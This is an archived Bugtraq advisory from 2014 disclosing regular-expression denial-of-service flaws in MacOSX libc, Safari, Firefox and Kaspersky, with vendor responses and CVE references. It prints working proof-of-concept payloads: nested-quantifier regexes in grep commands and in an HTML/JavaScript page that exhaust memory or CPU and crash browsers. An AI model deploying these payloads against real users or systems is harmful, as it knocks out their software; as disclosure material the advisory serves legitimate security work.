Home page logo
/

bugtraq logo Bugtraq mailing list archives

MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service
From: submit () cxsec org
Date: Sun, 16 Mar 2014 21:32:41 GMT

MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service
http://cxsecurity.com/

YouTube (Kaspersky PoC):
https://www.youtube.com/watch?v=joa_9IS7U90

---- 0. Where is the problem? ----
Some time ago I have reported vulnerabilities in regcomp() in BSD implementation (CVE-2011-3336) and GNU libc 
implementation (CVE-2010-4051 CVE-2010-4052). 
Now is the time for MacOSX and other software and It seems that the problem is still in their implementations. 


--- MacOSX 10.9.2 libc PoC ---
0:kozak6 cx$ ls |grep -E 
'((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
grep: out of memory
--- MacOSX 10.9.2 libc PoC ---


Recursion in Apple regcomp/libc() can lead to consumption, exhaustion, etc. (CWE-399)
The same problem occurs in javascript regexp implementation on Safari and Firefox.
In Kaspersky 14.0.0.4651(e) CPU Exhaustion has been observed.


Verified;
- Safari 7.0.2 (9537.74.9)
  MacOSX 10.9.2 Memory exhaustion (unpatched  CVE-2011-3336)
  Phone 4S, iOS 7.0.6 Crash
  
- Firefox 27.0.1
  Windows: Crash
  http://cert.cx/regexp-smaczki/regcomp2.png
  http://cert.cx/regexp-smaczki/visual4.png
  http://cert.cx/regexp-smaczki/visual3.png
  
  MacOSX: Memory exhaustion

- Kaspersky 14.0.0.4651(e)
  CPU Exhaustion and can't restart kaspersky again
  http://cert.cx/regexp-smaczki/kaspersky.jpg


We don't know full list of affected vendors. Anyway javascript PoC avaliable here

http://cert.cx/regexp-smaczki/regex.html

--- JavaScript PoC ---
<HTML>
<HEAD>
<TITLE>Firefox 27.0.1 and Safari 7.0.2 (9537.74.9)</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<SCRIPT type="text/javascript">
var patt1=new 
RegExp("((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))");
document.write(patt1.exec("peace"));
</SCRIPT>
</BODY>
</HTML>
--- JavaScript PoC ---


On Safari and Firefox under MacOSX this script will consume excessive memory. Windows version has allocated 3,8GB and 
crash


----------------------------
int readChecked(unsigned negativePositionOffest)
        {
            if (pos < negativePositionOffest)
                CRASH();
            unsigned p = pos - negativePositionOffest;
            ASSERT(p < length);
            return input[p];
        }
----------------------------


Firefox don't support 64 bits version for windows and only 4gb can be allocated to cause CRASH(). 

The most interesting is CPU Exhaustion observed in avp.exe process. Many requests to website where RegEx()/javascript 
code is located cause exhaustion of one cpu core. Closing and restarting Kaspersky is impossible.

YouTube (Kaspersky PoC):
https://www.youtube.com/watch?v=joa_9IS7U90

Patched: 16.03.2014

The situation with regexp security is not declared. Many vendors think that regcomp() should be secure by default but 
are also others opinions

https://bugzilla.redhat.com/show_bug.cgi?id=645859
---
Red Hat does not consider crash of client application, using regcomp() 
or regexec() routines on untrusted input without preliminary checking 
the input for the sanity, to be a security issue (the described deficiency 
implies and is a known limitation of the glibc regular expression engine 
implementation). The expressions can be modified to avoid quantification 
nesting, or program modified to limit size of input passed to regular 
expression engine. We do not currently plan to fix these flaws. If more 
information becomes available at a future date, we may revisit these issues.
---

and try compare with ZABIX statement

https://support.zabbix.com/browse/ZBX-4625

---
It shouldn't be fixed in Zabbix. That's something to be addressed by glibc maintainers.
---

In January 2014 Juniper has officially patched CVE-2010-4051 and CVE-2010-4052 in own products.

http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10612.

MacOSX libc in 10.9.2 is still vulnerable for CVE-2011-3336. 

0:log cx$ ls |grep -E '(.?)((((.*){1,100}){1,100}){1,100}){1,100}'

It shows how many varieties of regular expression we have and how hard it is to keep a single standard.


--- 1. Credit ---
Maksymilian Arciemowicz

--- 2. References ---
http://cxsecurity.com/issue/WLB-2014030108
http://cxsecurity.com/issue/WLB-2011010121
http://cxsecurity.com/issue/WLB-2011110082
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279
http://cxsecurity.com/cveshow/CVE-2011-3336
http://cxsecurity.com/
http://cert.cx/regexp-smaczki/regcomp2.png
http://cert.cx/regexp-smaczki/visual4.png
http://cert.cx/regexp-smaczki/visual3.png
http://cert.cx/regexp-smaczki/kaspersky.jpg
https://bugzilla.redhat.com/show_bug.cgi?id=645859
https://support.zabbix.com/browse/ZBX-4625
https://devilteam.pl/kaspersky.html
https://devilteam.pl/
https://www.youtube.com/watch?v=joa_9IS7U90


  By Date           By Thread  

Current thread:
  • MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service submit (Mar 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]